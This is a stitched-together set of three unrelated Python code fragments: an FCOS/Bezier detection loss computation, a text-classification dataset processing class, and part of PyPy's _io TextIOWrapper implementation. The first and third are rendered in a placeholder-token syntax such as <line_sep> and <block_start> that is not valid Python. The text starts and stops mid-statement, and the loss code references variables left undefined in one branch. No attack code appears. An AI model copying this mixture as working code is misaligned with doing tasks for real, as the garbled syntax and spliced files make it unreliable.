dim=0)<line_sep>num_points_per_level=[len(points_per_level)<for>points_per_level points]<line_sep>self.num_points_per_level=num_points_per_level<line_sep>points_all_level=torch.cat(points dim=0)<line_sep>labels,reg_targets,bezier_targets=self.compute_targets_for_locations(points_all_level targets expanded_object_sizes_of_interest)<for_stmt>i range(len(labels))<block_start>labels[i]=torch.split(labels[i] num_points_per_level 
dim=0)<line_sep>reg_targets[i]=torch.split(reg_targets[i] num_points_per_level dim=0)<line_sep>bezier_targets[i]=torch.split(bezier_targets[i] num_points_per_level dim=0)<block_end>labels_level_first=[]<line_sep>reg_targets_level_first=[]<line_sep>bezier_targets_level_first=[]<for_stmt>level range(len(points))<block_start>labels_level_first.append(torch.cat([labels_per_im[level]<for>labels_per_im labels] dim=0))<line_sep># normalize regression targets reg_targets_level_first.append(torch.cat([reg_targets_per_im[level]<for>reg_targets_per_im reg_targets] dim=0)/self.strides[level])<line_sep>bezier_targets_level_first.append(torch.cat([bezier_targets_per_im[level]<for>bezier_targets_per_im bezier_targets] dim=0)/self.strides[level])<block_end><return>labels_level_first reg_targets_level_first bezier_targets_level_first<block_end><def_stmt>compute_targets_for_locations self locations targets object_sizes_of_interest<block_start>labels=[]<line_sep>reg_targets=[]<line_sep>bezier_targets=[]<line_sep>xs,ys=locations[: 0] locations[: 1]<for_stmt>im_i range(len(targets))<block_start>targets_per_im=targets[im_i]<assert_stmt>targets_per_im.mode<eq>"xyxy"<line_sep>bboxes=targets_per_im.bbox<line_sep>labels_per_im=targets_per_im.get_field("labels")<line_sep>area=targets_per_im.area()<line_sep>l=xs[: <none>]-bboxes[: 0][<none>]<line_sep>t=ys[: <none>]-bboxes[: 1][<none>]<line_sep>r=bboxes[: 2][<none>]-xs[: <none>]<line_sep>b=bboxes[: 3][<none>]-ys[: <none>]<line_sep>reg_targets_per_im=torch.stack([l t r b] dim=2)<line_sep># bezier points are relative distances from center to control points bezier_pts=targets_per_im.get_field("beziers").bbox.view(-1 8 2)<line_sep>y_targets=bezier_pts[: : 0][<none>]-ys[: <none> <none>]<line_sep>x_targets=bezier_pts[: : 1][<none>]-xs[: <none> <none>]<line_sep>bezier_targets_per_im=torch.stack((y_targets x_targets) dim=3)<line_sep>bezier_targets_per_im=bezier_targets_per_im.view(xs.size(0) bboxes.size(0) 
16)<if_stmt>self.center_sample<block_start>is_in_boxes=self.get_sample_region(bboxes self.strides self.num_points_per_level xs ys radius=self.radius)<block_end><else_stmt><block_start>is_in_boxes=reg_targets_per_im.min(dim=2)[0]<g>0<block_end>max_reg_targets_per_im=reg_targets_per_im.max(dim=2)[0]<line_sep># limit the regression range for each location is_cared_in_the_level=(max_reg_targets_per_im<ge>object_sizes_of_interest[: [0]])&(max_reg_targets_per_im<le>object_sizes_of_interest[: [1]])<line_sep>locations_to_gt_area=area[<none>].repeat(len(locations) 1)<line_sep>locations_to_gt_area[is_in_boxes<eq>0]=INF<line_sep>locations_to_gt_area[is_cared_in_the_level<eq>0]=INF<line_sep># if there are still more than one objects for a location, # we choose the one with minimal area locations_to_min_aera,locations_to_gt_inds=locations_to_gt_area.min(dim=1)<line_sep>reg_targets_per_im=reg_targets_per_im[range(len(locations)) locations_to_gt_inds]<line_sep>bezier_targets_per_im=bezier_targets_per_im[range(len(locations)) locations_to_gt_inds]<line_sep>labels_per_im=labels_per_im[locations_to_gt_inds]<line_sep>labels_per_im[locations_to_min_aera<eq>INF]=0<line_sep>labels.append(labels_per_im)<line_sep>reg_targets.append(reg_targets_per_im)<line_sep>bezier_targets.append(bezier_targets_per_im)<block_end><return>labels reg_targets bezier_targets<block_end><def_stmt>compute_centerness_targets self reg_targets<block_start>left_right=reg_targets[: [0 2]]<line_sep>top_bottom=reg_targets[: [1 3]]<line_sep>centerness=(left_right.min(dim=-1)[0]/left_right.max(dim=-1)[0])<times>(top_bottom.min(dim=-1)[0]/top_bottom.max(dim=-1)[0])<line_sep><return>torch.sqrt(centerness)<block_end><def_stmt>__call__ self locations box_cls box_regression bezier_regression centerness targets<block_start>""" Arguments: locations (list[BoxList]) box_cls (list[Tensor]) box_regression (list[Tensor]) centerness (list[Tensor]) targets (list[BoxList]) Returns: cls_loss (Tensor) reg_loss (Tensor) centerness_loss 
(Tensor) """<line_sep>num_classes=box_cls[0].size(1)<line_sep>labels,reg_targets,bezier_targets=self.prepare_targets(locations targets)<line_sep>box_cls_flatten=[]<line_sep>box_regression_flatten=[]<line_sep>bezier_regression_flatten=[]<line_sep>centerness_flatten=[]<line_sep>labels_flatten=[]<line_sep>reg_targets_flatten=[]<line_sep>bezier_targets_flatten=[]<for_stmt>l range(len(labels))<block_start>box_cls_flatten.append(box_cls[l].permute(0 2 3 1).reshape(-1 num_classes))<line_sep>box_regression_flatten.append(box_regression[l].permute(0 2 3 1).reshape(-1 4))<line_sep>bezier_regression_flatten.append(bezier_regression[l].permute(0 2 3 1).reshape(-1 16))<line_sep>labels_flatten.append(labels[l].reshape(-1))<line_sep>reg_targets_flatten.append(reg_targets[l].reshape(-1 4))<line_sep>bezier_targets_flatten.append(bezier_targets[l].reshape(-1 16))<line_sep>centerness_flatten.append(centerness[l].reshape(-1))<block_end>box_cls_flatten=torch.cat(box_cls_flatten dim=0)<line_sep>box_regression_flatten=torch.cat(box_regression_flatten dim=0)<line_sep>bezier_regression_flatten=torch.cat(bezier_regression_flatten dim=0)<line_sep>centerness_flatten=torch.cat(centerness_flatten dim=0)<line_sep>labels_flatten=torch.cat(labels_flatten dim=0)<line_sep>reg_targets_flatten=torch.cat(reg_targets_flatten dim=0)<line_sep>bezier_targets_flatten=torch.cat(bezier_targets_flatten dim=0)<line_sep>pos_inds=torch.nonzero(labels_flatten<g>0).squeeze(1)<line_sep>num_pos_per_gpu=pos_inds.numel()<line_sep>num_gpus=get_world_size()<line_sep>total_num_pos=reduce_sum(pos_inds.new_tensor([num_pos_per_gpu])).item()<line_sep>box_regression_flatten=box_regression_flatten[pos_inds]<line_sep>bezier_regression_flatten=bezier_regression_flatten[pos_inds]<line_sep>reg_targets_flatten=reg_targets_flatten[pos_inds]<line_sep>bezier_targets_flatten=bezier_targets_flatten[pos_inds]<line_sep>centerness_flatten=centerness_flatten[pos_inds]<line_sep>cls_loss=self.cls_loss_func(box_cls_flatten 
labels_flatten.int())/max(total_num_pos/num_gpus 1.0)<line_sep># add N to avoid dividing by a zero <if_stmt>pos_inds.numel()<g>0<block_start>centerness_targets=self.compute_centerness_targets(reg_targets_flatten)<line_sep>sum_centerness_targets=centerness_targets.sum()<line_sep>sum_centerness_targets=reduce_sum(sum_centerness_targets).item()<line_sep>reg_loss=self.box_reg_loss_func(box_regression_flatten reg_targets_flatten centerness_targets)/(sum_centerness_targets/num_gpus)<line_sep>centerness_loss=self.centerness_loss_func(centerness_flatten centerness_targets)/max(total_num_pos/num_gpus 1.0)<block_end><else_stmt><block_start>reg_loss=box_regression_flatten.sum()<line_sep>bezier_loss=bezier_regression_flatten.sum()<line_sep>reduce_sum(centerness_flatten.new_tensor([0.0]))<line_sep>centerness_loss=centerness_flatten.sum()<block_end>bezier_loss=F.smooth_l1_loss(bezier_regression_flatten bezier_targets_flatten reduction="none")<line_sep>bezier_loss=((bezier_loss.mean(dim=-1)<times>centerness_targets).sum()/(sum_centerness_targets/num_gpus))<line_sep><return>cls_loss reg_loss bezier_loss centerness_loss<block_end><def_stmt>compute_offsets_targets self mask_targets reg_targets<block_start>num_chars=mask_targets.sum(dim=1).long()<line_sep>N,K=mask_targets.size()<line_sep>offsets_x=torch.zeros(N K dtype=torch.float32 device=mask_targets.device)<line_sep>offsets_y=torch.zeros(N K dtype=torch.float32 device=mask_targets.device)<for_stmt>i,(nc reg) enumerate(zip(num_chars reg_targets))<block_start>xs=(reg[2]+reg[0])<times>(torch.tensor(list(range(nc)) dtype=torch.float32 device=mask_targets.device)<times>2+1)/(nc<times>2)-reg[0]<line_sep>offsets_x[i :nc]=xs<line_sep>offsets_y[i :nc]=(reg[3]-reg[1])/2<block_end><return>torch.stack((offsets_y offsets_x) dim=2).view(N -1)<block_end><block_end><def_stmt>make_fcos_loss_evaluator cfg<block_start>loss_evaluator=FCOSLossComputation(cfg)<line_sep><return>loss_evaluator<block_end>
from functools import partial
from typing import Dict, List

from datasets import Dataset, Metric, load_dataset
from transformers import PretrainedConfig, PreTrainedTokenizerBase, TextClassificationPipeline
from transformers.pipelines.text_classification import ClassificationFunction

from .base import DatasetProcessing


class TextClassificationProcessing(DatasetProcessing):
    """Dataset loading, preprocessing and evaluation helpers for
    single- and pair-text classification tasks."""

    def __init__(self, **kwargs):
        if "secondary" not in kwargs["data_keys"]:
            # Single-text tasks pass no text pair to the tokenizer.
            kwargs["data_keys"]["secondary"] = None

        super().__init__(**kwargs)

        self.config = kwargs["config"]
        # Mapping from dataset label ids to the model's label ids, filled
        # in load_datasets() when the two disagree.
        self.label_to_id = None

    def load_datasets(self):
        """Load the evaluation (and optional calibration) splits and build
        the dataset-id -> model-id label mapping when needed.

        Returns a dict with an "eval" Dataset and, when static
        quantization is enabled, a tokenized "calibration" Dataset.
        """
        # Downloading and loading a dataset from the hub.
        raw_datasets = load_dataset(path=self.dataset_path, name=self.dataset_name)

        # BUGFIX: the evaluation split was silently capped at 100 samples
        # by a leftover debug line marked "TODO remove this"; evaluate on
        # the full split instead.
        max_eval_samples = None

        # Labels
        if not self.task_args["is_regression"]:
            label_list = raw_datasets[self.eval_split].features[self.ref_keys[0]].names
            num_labels = len(label_list)
        else:
            num_labels = 1

        if (
            self.config.label2id != PretrainedConfig(num_labels=num_labels).label2id
            and not self.task_args["is_regression"]
        ):
            # Some have all caps in their config, some don't.
            label_name_to_id = {k.lower(): v for k, v in self.config.label2id.items()}
            if list(sorted(label_name_to_id.keys())) == list(sorted(label_list)):
                self.label_to_id = {i: int(label_name_to_id[label_list[i]]) for i in range(num_labels)}
            else:
                print(
                    "Your model seems to have been trained with labels, but they don't match the dataset: ",
                    f"model labels: {list(sorted(label_name_to_id.keys()))}, dataset labels:"
                    f" {list(sorted(label_list))}.\nIgnoring the model labels as a result.",
                )

        # Preprocessing the raw_datasets
        def preprocess_function(examples, data_keys: Dict[str, str], tokenizer: PreTrainedTokenizerBase):
            # Tokenize the texts
            tokenized_inputs = tokenizer(
                text=examples[data_keys["primary"]],
                text_pair=examples[data_keys["secondary"]] if data_keys["secondary"] else None,
                padding="max_length",
                max_length=tokenizer.model_max_length,
                truncation=True,
            )
            return tokenized_inputs

        eval_dataset = raw_datasets[self.eval_split]
        if max_eval_samples is not None:
            eval_dataset = eval_dataset.select(range(max_eval_samples))

        datasets_dict = {"eval": eval_dataset}

        if self.static_quantization:
            assert self.calibration_split
            # Run the tokenizer on the calibration dataset
            calibration_dataset = raw_datasets[self.calibration_split].map(
                partial(
                    preprocess_function,
                    tokenizer=self.tokenizer,
                    data_keys=self.data_keys,
                ),
                batched=True,
                load_from_cache_file=True,
                desc="Running tokenizer on calibration dataset",
            )

            # Keep only the columns the model actually consumes.
            columns_to_remove = raw_datasets.column_names[self.calibration_split]
            columns_to_remove = [
                name for name in columns_to_remove if name not in self.tokenizer.model_input_names
            ]
            calibration_dataset = calibration_dataset.remove_columns(columns_to_remove)

            if self.num_calibration_samples is not None:
                calibration_dataset = calibration_dataset.select(range(self.num_calibration_samples))

            datasets_dict["calibration"] = calibration_dataset

        return datasets_dict

    def run_inference(self, eval_dataset: Dataset, pipeline: TextClassificationPipeline):
        """Run the pipeline over *eval_dataset* one example at a time.

        Returns (all_labels, all_preds): gold label ids and predicted
        label ids (or raw scores for regression tasks).
        """
        all_labels = []
        all_preds = []
        for _, inputs in enumerate(eval_dataset):
            has_labels = all(inputs.get(k) is not None for k in self.ref_keys)
            if has_labels:
                labels = tuple(inputs.get(name) for name in self.ref_keys)
                if len(labels) == 1:
                    labels = labels[0]
                else:
                    raise ValueError("Only one label supported.")
            else:
                raise ValueError("Missing labels")

            all_labels.append(labels)

            # we manually unroll the pipeline since it is broken
            # see https://github.com/huggingface/transformers/issues/17305
            if self.data_keys["secondary"]:
                inps = [inputs[self.data_keys["primary"]], inputs[self.data_keys["secondary"]]]
            else:
                inps = inputs[self.data_keys["primary"]]

            tokenized_inputs = pipeline.preprocess([inps])
            model_outputs = pipeline.forward(tokenized_inputs)

            # preds is a dict. No processing function is applied as not needed for score in the regression case
            preds = pipeline.postprocess(model_outputs, function_to_apply=ClassificationFunction.NONE)

            if not self.task_args["is_regression"]:
                # the dataset label ids may be different from the label2id of predictions
                if self.label_to_id is not None:
                    preds = self.config.label2id[preds["label"]]
                    # NOTE(review): label_to_id maps dataset ids to model
                    # ids, yet it is applied to a model id here — confirm
                    # the intended direction against the metric's refs.
                    preds = self.label_to_id[preds]
                else:
                    preds = self.config.label2id[preds["label"]]
            else:
                preds = preds["score"]

            all_preds.append(preds)

        return all_labels, all_preds

    def get_metrics(self, predictions: List, references: List, metric: Metric):
        """Compute *metric* over the collected predictions/references."""
        return metric.compute(predictions=predictions, references=references)

    def get_pipeline_kwargs(self):
        """No extra kwargs are needed for text-classification pipelines."""
        return {}
<import_stmt>sys<import_from_stmt>pypy.interpreter.baseobjspace W_Root<import_from_stmt>pypy.interpreter.error OperationError oefmt<import_from_stmt>pypy.interpreter.gateway WrappedDefault interp2app unwrap_spec<import_from_stmt>pypy.interpreter.typedef GetSetProperty TypeDef generic_new_descr interp_attrproperty interp_attrproperty_w <import_from_stmt>pypy.module._codecs interp_codecs<import_from_stmt>pypy.module._io.interp_iobase W_IOBase convert_size trap_eintr<import_from_stmt>rpython.rlib.rarithmetic intmask r_uint r_ulonglong<import_from_stmt>rpython.rlib.rbigint rbigint<import_from_stmt>rpython.rlib.rstring UnicodeBuilder<line_sep>STATE_ZERO,STATE_OK,STATE_DETACHED=range(3)<line_sep>SEEN_CR=1<line_sep>SEEN_LF=2<line_sep>SEEN_CRLF=4<line_sep>SEEN_ALL=SEEN_CR|SEEN_LF|SEEN_CRLF<line_sep>_WINDOWS=sys.platform<eq>'win32'<class_stmt>W_IncrementalNewlineDecoder(W_Root)<block_start>seennl=0<line_sep>pendingcr=<false><line_sep>w_decoder=<none><def_stmt>__init__ self space<block_start>self.w_newlines_dict={SEEN_CR:space.newunicode(u"\r") SEEN_LF:space.newunicode(u"\n") SEEN_CRLF:space.newunicode(u"\r\n") SEEN_CR|SEEN_LF:space.newtuple([space.newunicode(u"\r") space.newunicode(u"\n")]) SEEN_CR|SEEN_CRLF:space.newtuple([space.newunicode(u"\r") space.newunicode(u"\r\n")]) SEEN_LF|SEEN_CRLF:space.newtuple([space.newunicode(u"\n") space.newunicode(u"\r\n")]) SEEN_CR|SEEN_LF|SEEN_CRLF:space.newtuple([space.newunicode(u"\r") space.newunicode(u"\n") space.newunicode(u"\r\n")]) }<block_end>@unwrap_spec(translate=int)<def_stmt>descr_init self space w_decoder translate w_errors=<none><block_start>self.w_decoder=w_decoder<line_sep>self.translate=translate<if_stmt>space.is_none(w_errors)<block_start>self.w_errors=space.newtext("strict")<block_end><else_stmt><block_start>self.w_errors=w_errors<block_end>self.seennl=0<block_end><def_stmt>newlines_get_w self space<block_start><return>self.w_newlines_dict.get(self.seennl 
space.w_None)<block_end>@unwrap_spec(final=int)<def_stmt>decode_w self space w_input final=<false><block_start><if_stmt>self.w_decoder<is><none><block_start><raise>oefmt(space.w_ValueError "IncrementalNewlineDecoder.__init__ not called")<block_end># decode input (with the eventual \r from a previous pass) <if_stmt><not>space.is_w(self.w_decoder space.w_None)<block_start>w_output=space.call_method(self.w_decoder "decode" w_input space.newbool(bool(final)))<block_end><else_stmt><block_start>w_output=w_input<block_end><if_stmt><not>space.isinstance_w(w_output space.w_unicode)<block_start><raise>oefmt(space.w_TypeError "decoder should return a string result")<block_end>output=space.unicode_w(w_output)<line_sep>output_len=len(output)<if_stmt>self.pendingcr<and>(final<or>output_len)<block_start>output=u'\r'+output<line_sep>self.pendingcr=<false><line_sep>output_len<augadd>1<block_end># retain last \r even when not translating data: # then readline() is sure to get \r\n in one pass <if_stmt><not>final<and>output_len<g>0<block_start>last=output_len-1<assert_stmt>last<ge>0<if_stmt>output[last]<eq>u'\r'<block_start>output=output[:last]<line_sep>self.pendingcr=<true><line_sep>output_len<augsub>1<block_end><block_end><if_stmt>output_len<eq>0<block_start><return>space.newunicode(u"")<block_end># Record which newlines are read and do newline translation if # desired, all in one pass. seennl=self.seennl<line_sep># If, up to now, newlines are consistently \n, do a quick check # for the \r only_lf=<false><if_stmt>seennl<eq>SEEN_LF<or>seennl<eq>0<block_start>only_lf=(output.find(u'\r')<l>0)<block_end><if_stmt>only_lf# If not already seen, quick scan for a possible "\n" character. # (there's nothing else to be done, even when in translation mode) <block_start><if_stmt>seennl<eq>0<and>output.find(u'\n')<ge>0<block_start>seennl<augor>SEEN_LF<line_sep># Finished: we have scanned for newlines, and none of them # need translating. 
<block_end><block_end><elif_stmt><not>self.translate<block_start>i=0<while_stmt>i<l>output_len<block_start><if_stmt>seennl<eq>SEEN_ALL<block_start><break><block_end>c=output[i]<line_sep>i<augadd>1<if_stmt>c<eq>u'\n'<block_start>seennl<augor>SEEN_LF<block_end><elif_stmt>c<eq>u'\r'<block_start><if_stmt>i<l>output_len<and>output[i]<eq>u'\n'<block_start>seennl<augor>SEEN_CRLF<line_sep>i<augadd>1<block_end><else_stmt><block_start>seennl<augor>SEEN_CR<block_end><block_end><block_end><block_end><elif_stmt>output.find(u'\r')<ge>0# Translate! <block_start>builder=UnicodeBuilder(output_len)<line_sep>i=0<while_stmt>i<l>output_len<block_start>c=output[i]<line_sep>i<augadd>1<if_stmt>c<eq>u'\n'<block_start>seennl<augor>SEEN_LF<block_end><elif_stmt>c<eq>u'\r'<block_start><if_stmt>i<l>output_len<and>output[i]<eq>u'\n'<block_start>seennl<augor>SEEN_CRLF<line_sep>i<augadd>1<block_end><else_stmt><block_start>seennl<augor>SEEN_CR<block_end>builder.append(u'\n')<line_sep><continue><block_end>builder.append(c)<block_end>output=builder.build()<block_end>self.seennl<augor>seennl<line_sep><return>space.newunicode(output)<block_end><def_stmt>reset_w self space<block_start>self.seennl=0<line_sep>self.pendingcr=<false><if_stmt>self.w_decoder<and><not>space.is_w(self.w_decoder space.w_None)<block_start>space.call_method(self.w_decoder "reset")<block_end><block_end><def_stmt>getstate_w self space<block_start><if_stmt>self.w_decoder<and><not>space.is_w(self.w_decoder space.w_None)<block_start>w_state=space.call_method(self.w_decoder "getstate")<line_sep>w_buffer,w_flag=space.unpackiterable(w_state 2)<line_sep>flag=space.r_longlong_w(w_flag)<block_end><else_stmt><block_start>w_buffer=space.newbytes("")<line_sep>flag=0<block_end>flag<auglshift>1<if_stmt>self.pendingcr<block_start>flag<augor>1<block_end><return>space.newtuple([w_buffer space.newint(flag)])<block_end><def_stmt>setstate_w self space w_state<block_start>w_buffer,w_flag=space.unpackiterable(w_state 
2)<line_sep>flag=space.r_longlong_w(w_flag)<line_sep>self.pendingcr=bool(flag&1)<line_sep>flag<augrshift>1<if_stmt>self.w_decoder<and><not>space.is_w(self.w_decoder space.w_None)<block_start>w_state=space.newtuple([w_buffer space.newint(flag)])<line_sep>space.call_method(self.w_decoder "setstate" w_state)<block_end><block_end><block_end>W_IncrementalNewlineDecoder.typedef=TypeDef('_io.IncrementalNewlineDecoder' __new__=generic_new_descr(W_IncrementalNewlineDecoder) __init__=interp2app(W_IncrementalNewlineDecoder.descr_init) decode=interp2app(W_IncrementalNewlineDecoder.decode_w) reset=interp2app(W_IncrementalNewlineDecoder.reset_w) getstate=interp2app(W_IncrementalNewlineDecoder.getstate_w) setstate=interp2app(W_IncrementalNewlineDecoder.setstate_w) newlines=GetSetProperty(W_IncrementalNewlineDecoder.newlines_get_w) )<class_stmt>W_TextIOBase(W_IOBase)<block_start>w_encoding=<none><def_stmt>__init__ self space<block_start>W_IOBase.__init__(self space)<block_end><def_stmt>read_w self space w_size=<none><block_start>self._unsupportedoperation(space "read")<block_end><def_stmt>readline_w self space w_limit=<none><block_start>self._unsupportedoperation(space "readline")<block_end><def_stmt>write_w self space w_data<block_start>self._unsupportedoperation(space "write")<block_end><def_stmt>detach_w self space<block_start>self._unsupportedoperation(space "detach")<block_end><def_stmt>errors_get_w self space<block_start><return>space.w_None<block_end><def_stmt>newlines_get_w self space<block_start><return>space.w_None<block_end><block_end>W_TextIOBase.typedef=TypeDef('_io._TextIOBase' W_IOBase.typedef __new__=generic_new_descr(W_TextIOBase) read=interp2app(W_TextIOBase.read_w) readline=interp2app(W_TextIOBase.readline_w) write=interp2app(W_TextIOBase.write_w) detach=interp2app(W_TextIOBase.detach_w) encoding=interp_attrproperty_w("w_encoding" W_TextIOBase) newlines=GetSetProperty(W_TextIOBase.newlines_get_w) errors=GetSetProperty(W_TextIOBase.errors_get_w) 
)<def_stmt>_determine_encoding space encoding<block_start><if_stmt>encoding<is><not><none><block_start><return>space.newtext(encoding)<block_end><try_stmt><block_start>w_locale=space.call_method(space.builtin '__import__' space.newtext('locale'))<line_sep>w_encoding=space.call_method(w_locale 'getpreferredencoding')<block_end><except_stmt>OperationError<as>e# getpreferredencoding() may also raise ImportError <block_start><if_stmt><not>e.match(space space.w_ImportError)<block_start><raise><block_end><return>space.newtext('ascii')<block_end><else_stmt><block_start><if_stmt>space.isinstance_w(w_encoding space.w_text)<block_start><return>w_encoding<block_end><block_end><raise>oefmt(space.w_IOError "could not determine default encoding")<block_end><class_stmt>PositionCookie(object)<block_start><def_stmt>__init__ self bigint<block_start>self.start_pos=bigint.ulonglongmask()<line_sep>bigint=bigint.rshift(r_ulonglong.BITS)<line_sep>x=intmask(bigint.uintmask())<assert_stmt>x<ge>0<line_sep>self.dec_flags=x<line_sep>bigint=bigint.rshift(r_uint.BITS)<line_sep>x=intmask(bigint.uintmask())<assert_stmt>x<ge>0<line_sep>self.bytes_to_feed=x<line_sep>bigint=bigint.rshift(r_uint.BITS)<line_sep>x=intmask(bigint.uintmask())<assert_stmt>x<ge>0<line_sep>self.chars_to_skip=x<line_sep>bigint=bigint.rshift(r_uint.BITS)<line_sep>self.need_eof=bigint.tobool()<block_end><def_stmt>pack self# The meaning of a tell() cookie is: seek to position, set the # decoder flags to dec_flags, read bytes_to_feed bytes, feed them # into the decoder with need_eof as the EOF flag, then skip # chars_to_skip characters of the decoded result. For most simple # decoders, tell() will often just give a byte offset in the file. 
<block_start>rb=rbigint.fromrarith_int<line_sep>res=rb(self.start_pos)<line_sep>bits=r_ulonglong.BITS<line_sep>res=res.or_(rb(r_uint(self.dec_flags)).lshift(bits))<line_sep>bits<augadd>r_uint.BITS<line_sep>res=res.or_(rb(r_uint(self.bytes_to_feed)).lshift(bits))<line_sep>bits<augadd>r_uint.BITS<line_sep>res=res.or_(rb(r_uint(self.chars_to_skip)).lshift(bits))<line_sep>bits<augadd>r_uint.BITS<line_sep><return>res.or_(rb(r_uint(self.need_eof)).lshift(bits))<block_end><block_end><class_stmt>PositionSnapshot<block_start><def_stmt>__init__ self flags input<block_start>self.flags=flags<line_sep>self.input=input<block_end><block_end><class_stmt>DecodeBuffer(object)<block_start><def_stmt>__init__ self text=<none><block_start>self.text=text<line_sep>self.pos=0<block_end><def_stmt>set self space w_decoded<block_start>check_decoded(space w_decoded)<line_sep>self.text=space.unicode_w(w_decoded)<line_sep>self.pos=0<block_end><def_stmt>reset self<block_start>self.text=<none><line_sep>self.pos=0<block_end><def_stmt>get_chars self size<block_start><if_stmt>self.text<is><none><block_start><return>u""<block_end>available=len(self.text)-self.pos<if_stmt>size<l>0<or>size<g>available<block_start>size=available<block_end><assert_stmt>size<ge>0<if_stmt>self.pos<g>0<or>size<l>available<block_start>start=self.pos<line_sep>end=self.pos+size<assert_stmt>start<ge>0<assert_stmt>end<ge>0<line_sep>chars=self.text[start:end]<block_end><else_stmt><block_start>chars=self.text<block_end>self.pos<augadd>size<line_sep><return>chars<block_end><def_stmt>has_data self<block_start><return>(self.text<is><not><none><and><not>self.exhausted())<block_end><def_stmt>exhausted self<block_start><return>self.pos<ge>len(self.text)<block_end><def_stmt>next_char self<block_start><if_stmt>self.exhausted()<block_start><raise>StopIteration<block_end>ch=self.text[self.pos]<line_sep>self.pos<augadd>1<line_sep><return>ch<block_end><def_stmt>peek_char self# like next_char, but doesn't advance pos 
<block_start><if_stmt>self.exhausted()<block_start><raise>StopIteration<block_end>ch=self.text[self.pos]<line_sep><return>ch<block_end><def_stmt>find_newline_universal self limit# Universal newline search. Find any of \r, \r\n, \n # The decoder ensures that \r\n are not split in two pieces <block_start><if_stmt>limit<l>0<block_start>limit=sys.maxint<block_end>scanned=0<while_stmt>scanned<l>limit<block_start><try_stmt><block_start>ch=self.next_char()<line_sep>scanned<augadd>1<block_end><except_stmt>StopIteration<block_start><return><false><block_end><if_stmt>ch<eq>u'\n'<block_start><return><true><block_end><if_stmt>ch<eq>u'\r'<block_start><if_stmt>scanned<ge>limit<block_start><return><false><block_end><try_stmt><block_start>ch=self.peek_char()<block_end><except_stmt>StopIteration<block_start><return><false><block_end><if_stmt>ch<eq>u'\n'<block_start>self.next_char()<line_sep><return><true><block_end><else_stmt><block_start><return><true><block_end><block_end><block_end><return><false><block_end><def_stmt>find_crlf self limit<block_start><if_stmt>limit<l>0<block_start>limit=sys.maxint<block_end>scanned=0<while_stmt>scanned<l>limit<block_start><try_stmt><block_start>ch=self.next_char()<block_end><except_stmt>StopIteration<block_start><return><false><block_end>scanned<augadd>1<if_stmt>ch<eq>u'\r'<block_start><if_stmt>scanned<ge>limit<block_start><return><false><block_end><try_stmt><block_start><if_stmt>self.peek_char()<eq>u'\n'<block_start>self.next_char()<line_sep><return><true><block_end><block_end><except_stmt>StopIteration# This is the tricky case: we found a \r right at the end <block_start>self.pos<augsub>1<line_sep><return><false><block_end><block_end><block_end><return><false><block_end><def_stmt>find_char self marker 
limit<block_start><if_stmt>limit<l>0<block_start>limit=sys.maxint<block_end>scanned=0<while_stmt>scanned<l>limit<block_start><try_stmt><block_start>ch=self.next_char()<block_end><except_stmt>StopIteration<block_start><return><false><block_end><if_stmt>ch<eq>marker<block_start><return><true><block_end>scanned<augadd>1<block_end><return><false><block_end><block_end><def_stmt>check_decoded space w_decoded<block_start><if_stmt><not>space.isinstance_w(w_decoded space.w_unicode)<block_start>msg="decoder should return a string result, not '%T'"<line_sep><raise>oefmt(space.w_TypeError msg w_decoded)<block_end><return>w_decoded<block_end><class_stmt>W_TextIOWrapper(W_TextIOBase)<block_start><def_stmt>__init__ self space<block_start>W_TextIOBase.__init__(self space)<line_sep>self.state=STATE_ZERO<line_sep>self.w_encoder=<none><line_sep>self.w_decoder=<none><line_sep>self.decoded=DecodeBuffer()<line_sep>self.pending_bytes=<none># list of bytes objects waiting to be # written, or NULL self.chunk_size=8192<line_sep>self.readuniversal=<false><line_sep>self.readtranslate=<false><line_sep>self.readnl=<none><line_sep>self.encodefunc=<none># Specialized encoding func (see below) self.encoding_start_of_stream=<false># Whether or not it's the start # of the stream self.snapshot=<none><block_end>@unwrap_spec(encoding="text_or_none" line_buffering=int)<def_stmt>descr_init self space w_buffer encoding=<none> w_errors=<none> w_newline=<none> line_buffering=0<block_start>self.state=STATE_ZERO<line_sep>self.w_buffer=w_buffer<line_sep>self.w_encoding=_determine_encoding(space encoding)<if_stmt>space.is_none(w_errors)<block_start>w_errors=space.newtext("strict")<block_end>self.w_errors=w_errors<if_stmt>space.is_none(w_newline)<block_start>newline=<none><block_end><else_stmt><block_start>newline=space.unicode_w(w_newline)<block_end><if_stmt>newline<and>newline<not><in>(u'\n' u'\r\n' u'\r')<block_start><raise>oefmt(space.w_ValueError "illegal newline value: %R" 
w_newline)<block_end>self.line_buffering=line_buffering<line_sep>self.readuniversal=<not>newline# null or empty self.readtranslate=newline<is><none><line_sep>self.readnl=newline<line_sep>self.writetranslate=(newline<ne>u'')<if_stmt><not>self.readuniversal<block_start>self.writenl=self.readnl<if_stmt>self.writenl<eq>u'\n'<block_start>self.writenl=<none><block_end><block_end><elif_stmt>_WINDOWS<block_start>self.writenl=u"\r\n"<block_end><else_stmt><block_start>self.writenl=<none><block_end># build the decoder object <if_stmt>space.is_true(space.call_method(w_buffer "readable"))<block_start>w_codec=interp_codecs.lookup_codec(space space.text_w(self.w_encoding))<line_sep>self.w_decoder=space.call_method(w_codec "incrementaldecoder" w_errors)<if_stmt>self.readuniversal<block_start>self.w_decoder=space.call_function(space.gettypeobject(W_IncrementalNewlineDecoder.typedef) self.w_decoder space.newbool(self.readtranslate))<block_end><block_end># build the encoder object <if_stmt>space.is_true(space.call_method(w_buffer "writable"))<block_start>w_codec=interp_codecs.lookup_codec(space space.text_w(self.w_encoding))<line_sep>self.w_encoder=space.call_method(w_codec "incrementalencoder" w_errors)<block_end>self.seekable=space.is_true(space.call_method(w_buffer "seekable"))<line_sep>self.telling=self.seekable<line_sep>self.encoding_start_of_stream=<false><if_stmt>self.seekable<and>self.w_encoder<block_start>self.encoding_start_of_stream=<true><line_sep>w_cookie=space.call_method(self.w_buffer "tell")<if_stmt><not>space.eq_w(w_cookie space.newint(0))<block_start>self.encoding_start_of_stream=<false><line_sep>space.call_method(self.w_encoder "setstate" space.newint(0))<block_end><block_end>self.state=STATE_OK<block_end><def_stmt>_check_init self space<block_start><if_stmt>self.state<eq>STATE_ZERO<block_start><raise>oefmt(space.w_ValueError "I/O operation on uninitialized object")<block_end><block_end><def_stmt>_check_attached self 
